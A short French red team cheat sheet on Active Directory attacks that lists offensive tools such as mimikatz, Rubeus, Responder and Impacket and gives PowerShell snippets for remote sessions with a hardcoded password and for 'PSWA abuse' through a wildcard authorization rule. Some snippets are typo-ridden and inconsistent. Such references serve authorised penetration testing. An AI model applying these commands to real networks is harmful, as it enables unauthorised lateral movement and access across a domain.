
Red Team Cheatsheet en constante expansion.

Vous pouvez me soutenir ici 🐱 :
Cet aide-mémoire sur les attaques AD, créé par RistBS, est inspiré du dépôt Active-Directory-Exploitation-Cheat-Sheet.
Outils PowerShell :
[⭐] Nishang -> https://github.com/samratashok/nishangNishang contient plusieurs scripts utiles pour le pentesting Windows dans un environnement PowerShell.
PowerView est un script de PowerSploit qui permet l'énumération de l'architecture AD pour un éventuel mouvement latéral.
Outils d'énumération :
[⭐] Bloodhound -> https://github.com/BloodHoundAD/BloodHound[⭐] crackmapexec -> https://github.com/byt3bl33d3r/CrackMapExeBoîte à outils d'exploitation AD :
[⭐] Impacket -> https://github.com/SecureAuthCorp/impacket[⭐] kekeo -> https://github.com/gentilkiwi/kekeoOutils de dump :
[⭐] mimikatz -> https://github.com/gentilkiwi/mimikatz[⭐] rubeus -> https://github.com/GhostPack/RubeusOutil d'écoute :
[⭐] responder -> https://github.com/SpiderLabs/ResponderSession PS :```powershell #METHOD 1 $c = New-PSSession -ComputerName 10.10.13.100 -Authentication Negociate -Credential $user Enter-PSSession -Credential $c -ComputerName 10.10.13.100
$pass = ConvertTo-SecureString 'Ab!Q@aker1' -asplaintext -force $cred = New-Object System.Management.Automation.PSCredential('$user, $pass') Enter-PSSession -Credential $c -ComputerName 10.10.13.100
### Abus de PSWA
permet à toute personne possédant des identifiants de se connecter à n'importe quelle machine et à n'importe quelle configuration
**[ ! ] cette action nécessite des identifiants.**```powershell
Add-PswaAuthorizationRule -UsernName * -ComputerName * -ConfigurationName *